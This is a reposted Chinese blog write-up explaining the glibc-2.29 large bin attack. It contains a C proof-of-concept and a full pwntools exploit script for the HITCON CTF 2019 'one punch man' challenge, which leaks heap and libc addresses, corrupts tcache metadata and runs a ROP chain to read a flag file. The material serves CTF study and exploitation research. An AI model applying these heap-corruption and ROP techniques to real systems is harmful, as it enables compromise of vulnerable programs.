glibc-2.29 large bin attack 原理

最新推荐文章于 2024-03-27 23:10:28 发布
最新推荐文章于 2024-03-27 23:10:28 发布
阅读量1k 收藏 1
点赞数
原文链接:https://mp.weixin.qq.com/s/a8SVgUBSa6ajJWeoSwmb3w
版权

glibc-2.29 large bin attack 原理

原创: 星盟安全团队 星盟安全

该方法并非笔者发现,而是阅读 balsn 的 writeup 时分析而得到的,这里介绍一下这种攻击方法。

unsorted bin attack
在介绍新的攻击技术之前,先来缅怀一下 unsorted bin attack , 由于 glibc-2.29 新上的保护措施,使得 unsorted bin attack 基本已经成为过去式。

unsorted bin attack的原理是利用 unsortedbin 在解链时,对 fd 指针的操作,直接的作用就是可以任意地址写入一个 main_arena 地址值,非常好用的攻击方法。虽然 glibc-2.29 不能使用 unsorted bin attack 了,但是 large bin attack 或许可以成为它的代替品。

large bin attack
glibc-2.29 的 large bin attack 和先前的并不完全一样,但是原理类似。
其主要发生在 large bin 的 nextsize 成环时,没有对其进行检查,所以只要存在 UAF 漏洞,就能修改 nextsize 指针进行任意地址写入 chunk 地址的操作。

漏洞主要发生在下列代码(来自 glibc-2.29/malloc/malloc.c:3841 ):

victim_index = largebin_index (size);
        bck =bin_at (av, victim_index);
        fwd =bck->fd;
 
        /* maintainlarge bins in sorted order */
        if (fwd !=bck)
          {
            /* Orwith inuse bit to speed comparisons */
            size |=PREV_INUSE;
            /* if smaller than smallest, bypassloop below */
            assert(chunk_main_arena (bck->bk));
            if ((unsignedlong) (size)
    < (unsigned long)chunksize_nomask (bck->bk))
              {
                fwd= bck;
                bck = bck->bk;
 
               victim->fd_nextsize = fwd->fd;
               victim->bk_nextsize = fwd->fd->bk_nextsize; // one
               fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize =victim;
              }
            else
              {
               assert (chunk_main_arena (fwd));
                while((unsigned long) size < chunksize_nomask (fwd))
                  {
                   fwd = fwd->fd_nextsize;
  assert(chunk_main_arena (fwd));
                  }
 
                // but size must be different
                if((unsigned long) size
  == (unsigned long)chunksize_nomask (fwd))
                  /*Always insert in the second position.  */
                 fwd = fwd->fd;
                else
                  {
                   victim->fd_nextsize = fwd;
                   victim->bk_nextsize = fwd->bk_nextsize;
                   fwd->bk_nextsize = victim;
                   victim->bk_nextsize->fd_nextsize = victim; // two
                  }
                bck = fwd->bk;
              }
          }
        else
         victim->fd_nextsize = victim->bk_nextsize = victim;

large bin 是以 victimindex 为单位进行 nextsize 之间的成环操作,每个 victimindex 的长度是 0x40,上面的代码是 unsorted bin 进行归位 操作时,将 本属于该环的 victim 插入到该环中。但是这里却没有unsorted bin 那样对指针进行检查。

由于 large bin 是双向链表,插入操作并不会对整个环进行检查,这里我们只需要劫持 其bk_nextsize 指针,那么在插入的时候,程序便会把该假的地址当成一个真的 chunk 从而进行双向链表插入操作,这样就会使得该要插入的 chunk 将会留下它的地址到我们 设置的任意地址。

其核心代码是victim->bk_nextsize = fwd->fd->bk_nextsize; // one或者victim->bk_nextsize->fd_nextsize = victim; // two,就是在这里完成了写操作,具体执行哪段代码还要取决与两个chunk 的size 比较。

这里提醒一点,两个chunk 的size不能相同,否则会执行下面程序流而导致不能实现我们的目的。


if ((unsigned long) size
  == (unsigned long)chunksize_nomask (fwd))
  /* Always insertin the second position.  */
  fwd = fwd->fd;

其次是 large bin 的 fdnextsize 需要设置为0,否则程序流会执行到下面的代码进行unlink 操作,那么就无法通过 unlink 对 large bin 的 bknextsize 和fd_nextsize 检查。
来自 glibc-2.29/malloc/malloc.c:4049

size = chunksize(victim);
 
  /*  We know the first chunk in this bin is bigenough to use. */
  assert ((unsignedlong) (size) >= (unsigned long) (nb));
 
  remainder_size =size - nb;
 
  /* unlink */
  unlink_chunk (av,victim);

样例代码

#include <stdio.h>
#include <stdlib.h>
 
size_t buf[0x10];
 
int main()
{
    size_t *ptr,*ptr2, *ptr3;
    setbuf(stdout, NULL);
 
    ptr = malloc(0x438);
    malloc(0x18);
    ptr2 = malloc(0x448);
    malloc(0x18);
    free(ptr);
    // put ptr intolarge bin
    malloc(0x600);
    free(ptr2);
    ptr[2] = 0;
    ptr[3] = (size_t)&buf[0];
 
    printf("buf[4]:0x%lx\n", buf[4]);
    ptr3 = malloc(0x68);
    printf("buf[4]:0x%lx\n", buf[4]);
 
    return 0;
}

buf[4]就相当于 fakechunk->fdnextsize 指针,指向该节点的上一个节点。

执行结果如下所示:

buf[4]: 0x0
buf[4]: 0x560075a246b0

例题 - HITCON CTF 2019 PWN - one punch man
文件链接:https://github.com/Ex-Origin/ctf-writeups/tree/master/hitconctf2019/pwn/onepunchman。
该程序主要的漏洞就是在delete时没有清理指针,导致UAF。

void delete()
{
  unsigned int v0; //[rsp+Ch] [rbp-4h]
 
  write_str("idx:");
  v0 = get_int();
  if ( v0 > 2 )
    error((__int64)"invalid");
  free((void*)heros[v0].calloc_ptr);
}

程序预置了后门函数,但是在tcache上有限制,必须要我们劫持tcache_perthread_struct才行,这里有两种思路,我自己的做法是劫持tcache_perthread_struct->entries,这里由于和本文章关系不大,这里我简要说下核心思路:利用tcache_perthread_struct->counts 伪造 size,然后利用 unlink 使得chunk overlap,然后控制其tcache_perthread_struct->entries。

第二种做法就是 balsn 战队的做法,很优秀的方法,核心思路就是利用large bin attack修改 tcache_perthread_struct->counts 来使用预置后门,然后用add 当中的缓冲区进行 ROP。
下面是 balsn 的脚本。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import sys
import time
import random
host = '52.198.120.1'
port = 48763
 
r = process('./one_punch')
 
binary = "./one_punch"
context.binary = binary
elf = ELF(binary)
try:
  libc = ELF("./libc-2.29.so")
  log.success("libcload success")
  system_off =libc.symbols.system
  log.success("system_off= "+hex(system_off))
except:
  log.failure("libcnot found !")
 
def name(index, name):
  r.recvuntil(">")
  r.sendline("1")
  r.recvuntil(":")
 r.sendline(str(index))
  r.recvuntil(":")
  r.send(name)
  pass
 
def rename(index,name):
  r.recvuntil(">")
  r.sendline("2")
  r.recvuntil(":")
 r.sendline(str(index))
  r.recvuntil(":")
  r.send(name)
 
  pass
 
def d(index):
  r.recvuntil(">")
  r.sendline("4")
  r.recvuntil(":")
 r.sendline(str(index))
  pass
 
def show(index):
  r.recvuntil(">")
  r.sendline("3")
  r.recvuntil(":")
  r.sendline(str(index))
 
def magic(data):
  r.recvuntil(">")
  r.sendline(str(0xc388))
  time.sleep(0.1)
  r.send(data)
 
# if len(sys.argv) == 1:
#   r =process([binary, "0"],env={"LD_LIBRARY_PATH":"."})
 
# else:
#   r = remote(host,port)
 
if __name__ == '__main__':
  name(0,"A"*0x210)
  d(0)
  name(1,"A"*0x210)
  d(1)
  show(1)
  r.recvuntil("name: ")
  heap =u64(r.recv(6).ljust(8,"\x00")) - 0x260
  print("heap= {}".format(hex(heap)))
  for i in xrange(5):
    name(2,"A"*0x210)
    d(2)
  name(0,"A"*0x210)
  name(1,"A"*0x210)
  d(0)
  show(0)
  r.recvuntil("name: ")
  libc =u64(r.recv(6).ljust(8,"\x00")) - 0x1e4ca0
  print("libc= {}".format(hex(libc)))
  d(1)
  rename(2,p64(libc+ 0x1e4c30))
 
  name(0,"D"*0x90)
  d(0)
  for i in xrange(7):
    name(0,"D"*0x80)
    d(0)
  for i in xrange(7):
    name(0,"D"*0x200)
    d(0)
 
  name(0,"D"*0x200)
  name(1,"A"*0x210)
  name(2,p64(0x21)*(0x90/8))
  rename(2,p64(0x21)*(0x90/8))
  d(2)
  name(2,p64(0x21)*(0x90/8))
  rename(2,p64(0x21)*(0x90/8))
  d(2)
 
  d(0)
  d(1)
  name(0,"A"*0x80)
  name(1,"A"*0x80)
  d(0)
  d(1)
  name(0,"A"*0x88+ p64(0x421) + "D"*0x180 )
  name(2,"A"*0x200)
  d(1)
  d(2)
  name(2,"A"*0x200)
  rename(0,"A"*0x88+ p64(0x421) + p64(libc + 0x1e5090)*2 + p64(0) + p64(heap+0x10) )
  d(0)
  d(2)
 
  // pause()
  name(0,"/home/ctf/flag\x00\x00"+ "A"*0x1f0)
  magic("A")
  add_rsp48 = libc+ 0x000000000008cfd6
  pop_rdi = libc + 0x0000000000026542
  pop_rsi = libc + 0x0000000000026f9e
  pop_rdx = libc + 0x000000000012bda6
  pop_rax = libc + 0x0000000000047cf8
  syscall = libc + 0xcf6c5
  magic(p64(add_rsp48))
 
  name(0,p64(pop_rdi)+ p64(heap + 0x24d0) + p64(pop_rsi) + p64(0) + p64(pop_rax) + p64(2) +p64(syscall) +
      p64(pop_rdi)+ p64(3) + p64(pop_rsi) + p64(heap) + p64(pop_rdx) + p64(0x100) + p64(pop_rax)+ p64(0) + p64(syscall) +
      p64(pop_rdi)+ p64(1) + p64(pop_rsi) + p64(heap) + p64(pop_rdx) + p64(0x100) + p64(pop_rax)+ p64(1) + p64(syscall)
      )
r.interactive()

在上面的// pause()处暂停,查看其bin情况。

pwndbg> largebins
largebins
0x400: 0x56224269a4c0 —▸ 0x7f455f1dd090 (main_arena+1104)◂—0x56224269a4c0
pwndbg> x/6gx 0x56224269a4c0
0x56224269a4c0:   0x4141414141414141 0x0000000000000421
0x56224269a4d0:   0x00007f455f1dd090 0x00007f455f1dd090
0x56224269a4e0:   0x0000000000000000 0x0000562242698010
pwndbg>

这里构造好了 large bin attack,当进行 unsorted bin 归位时,便会修改tcache_perthread_struct->counts。
笔者是星盟安全团队成员之一,这里欢迎热爱网络安全的小伙伴们加入星盟安全:XHUwMDc4XHUwMDY5XHUwMDZlXHUwMDY3XHUwMDZkXHUwMDY1XHUwMDZlXHUwMDY3XHUwMDVmXHUwMDczXHUwMDY1XHUwMDYzXHUwMDQwXHUwMDMxXHUwMDM2XHUwMDMzXHUwMDJlXHUwMDYzXHUwMDZmXHUwMDZk。

——————————————————
更多资讯欢迎关注星盟安全公众号:
在这里插入图片描述

TUANZI_Dum
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【堆漏洞 - Unsorted bin/ Large bin Attack
m0_52343643的博客
04-06 245
malloc 从 unsorted bin 取 chunk 的时候,如果对应的 tcache bin 还未装满,则会将 unsorted bin 里的 chunk 全部放进对应的 tcache bin,然后再从 tcache bin 中取出。使 unsorted chunk 大于链表中最小的 chunk 时的利用失效,必须使 unsorted chunk 小于链表中最小的 chunk。unsorted chunk 小于链表中最小的 chunk 的时候会执行前一句,反之执行后一句。
Linux64位 安装 32位文件报错 /lib/ld-linux.so.2: bad ELF interpreter: No such file or directory
ArvinWoo
11-03 2150
1、在64系统里执行32位程序如果出现/lib/ld-linux.so.2: bad ELF interpreter: No such file or directory,安装下glic即可 yum install glibc.i686 2、error while loading shared libraries: libz.so.1: cannot open shared object fi...
安装GLIBC_2.29
Eric
11-23 4359
安装GLIBC_2.29
基于CentOS更新 glibc - 解决 `GLIBC_2.29‘ not found
热门推荐
翔底的博客
11-06 1万+
前面使用源代码安装参考了 GNU C 的官方文档,文档的描述很详细,但是没有说明更新后不能使用的情况。使用 rpm 包很考验耐心,最后还是会因为包之间相互依赖而导致问题,真的很烦。
实测Centos7,8升级到glibc2.29
Angel、骷髅博客
03-17 8522
实测Centos7,8升级到glibc2.29成功
glibc-2.29
10-23
glibc-2.29的升级对于解决程序依赖问题和提高系统整体性能至关重要,但同时也需要谨慎处理,避免因升级带来的潜在风险。了解glibc的功能、版本特性以及升级注意事项,有助于在Linux环境中进行有效的系统维护和软件...
glibc-2.29-11-ge28ad442e73b00ae2047d89c8cc7f9b2a0de5436.tar.gz
07-28
glibc-2.29:构建现代Linux系统的基石》 glibc,全称为GNU C Library,是GNU项目的一部分,是Linux系统中最核心的库之一,为应用程序提供大量的C语言接口。glibc-2.29是这个库的一个特定版本,它的出现对于系统...
linux系统glibc-2.29
08-30
linux系统libc库glibc-2.29glibcglibc-2.29
glibc-2.29.tar.gz
07-11
《GNU C库详解:以glibc-2.29为例》 GNU C库,简称glibc,是Linux操作系统中广泛使用的C语言标准库,由GNU项目开发并维护。这个库包含了C语言编程所需的各种基本函数,是Linux系统软件开发的重要组成部分。在本文中...
glibc-2.29源码包
07-20
glibc-2.29源码包 glibc-2.29源码包 glibc-2.29源码包
version `GLIBC_2.29‘ not found 的原因和怎么解决问题
闲人的专栏
12-15 1万+
程序上经常有在这台Linux上编译,然后放到另一个Linux上运行的情况。如果Linux版本差别不大或都是ubuntu或centos系列还好。如果不是一个系列很容易出现GLIBC 找不到的情况。尤其是ubuntu上编译,然后放到centos系列。因为centos为了追求所谓的稳定,基本用的都是N年前的东西,生怕用新的东西把它给搞的不安全了。
version `GLIBC_2.29‘ not found 解决方法
最新发布
zheng的博客
03-27 2306
由于工作原因,需要部署软件到不同的系统下面,所以选择了市面上比较成熟的QT。在Win 7上面进行打包,在其余Win 7/10的电脑上运行正常。后续需求系统使用CentOS 8。在Linux下打包无问题,但是在其他Linux系统下运行结果不一。
G++编译时的GLIBC版本问题
MISS假老练的博客
07-06 2525
是我在更高GLIBC版本的linux系统上事先编译好的动态库在公司服务器上编译时报错,因为我个人电脑上的Ubuntu版本为22,gcc版本为11,GLIBC版本为2.35;而公司的服务器Ubuntu版本为18,gcc版本为7.5,GLIBC版本为2.27。所以导致高版本编译的动态库使用的更高版本的API在低GLIBC版本系统中没有对应的实现。远程开发的时候遇到这个问题,搞了快两天, 现在来记录一下。在使用相同版本的GLIBC的环境下重新编译动态库。
centos7 解决 /lib64/libm.so.6: version “GLIBC 2.29
qq_31292011的博客
12-05 3994
执行代码时报如下错误: 解决方案: 安装包版本:Python-3.7.4、make-4.3、glibc-2.29 (1)、安装Python-3.7.4 yum update -y wget https://www.python.org/ftp/python/3.7.4/Python-3.7.4.tgz tar xzf Python-3.7.4.tgz cd Python-3.7.4 ./configure yum install libffi-devel zlib* -y vim Modules/S
RedHat8升级GLIBC_2.29,解决ImportError: /lib64/libm.so.6: version `GLIBC_2.29
运维giao的博客
10-24 1189
在本地将glibc-2.29进行编译,然后根据python脚本执行报错所给出的路径信息,将glibc-2.29编译后的libm-2.29.so与/lib64/下的libm.so.6重新做个软连接,其他底层的依赖版本不进行更改。在网上查了很多方法,都太建议升级glibc版本,对系统影响比较大,而且升级起来很麻烦,很多底层的依赖也要跟着升级。目前已经在ubuntu系统上是没问题的,但又不想重装系统,所以还是选择了在系统本地升级glibc版本。其他报错也可以按照我这个方案进行软连接替换,提示什么就替换什么。
Ubuntu18.04升级GLIBC_2.29,解决ImportError: /lib/x86_64-linux-gnu/libm.so.6: version `GLIBC_2.29
weixin_46587777的博客
06-08 5334
个人在搭配环境(Ubuntu18.04),使用时出现如下报错:分析上述报错,新版transformers的tokenizers需要2.29版本的说明服务器当前是没有GLIBC_2.29的。
Ubuntu 18.04升级GLIBC2.27为GLIBC2.29
weixin_74167774的博客
09-18 3302
上面指令是在新终端中查看当前的链接,会发现libm.so.6-->libm-2.27.so,即此时链接的版本仍为2.27。接下来就是为2.29版本创建软链接。到这里, GLIBC2.27就已经成功升级到GLIBC2.29了。升级之后,开机启动后会有一个报错的界面,需要手动关闭,目前没有发现其产生的以后影响。输入这句指令将libm-2.29.so复制到/lib/x86_64-linux-gnu目录下,可以手动打开目录查看是否复制到了正确的目录下。输入本句指令查看结果。3. 解压并创建对应文件夹。
glibc2.29下unsortedbin_attack的替代方法
蚁景网安学院
05-22 820
glibc2.29下unsortedbin_attack的替代方法国际生物多样性日固定布局 ...
fastbin attack + unsorted bin attack+ heap overflow+ double free fastbin + double free unlink
qq_39869547的博客
10-27 372
0x1 fastbin依靠单链表来组织的,堆管理结构始终维护一个指向最后一个chunk的指针(倒数第二个chunk的fd,通常情况这个fd指向的是下一个chunk起始地址)。这个指针决定了下一次要分配的chunk地址。 也就是说默认分配最好一个chunk给用户使用,同时最后一个chunk也是我们一开始第一个free掉的 0x2 我们的目的修改某一个chunk的fd ,这样我们就可以任意地址分配我们...
glibc-2.29 下载
07-09
要从官方网站下载 glibc-2.29,首先需要访问 GNU C Library(glibc)的官方网站。在浏览器中输入 https://www.gnu.org/software/libc/download.html,然后找到 glibc-2.29 的下载链接。 点击该下载链接后,会打开一...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值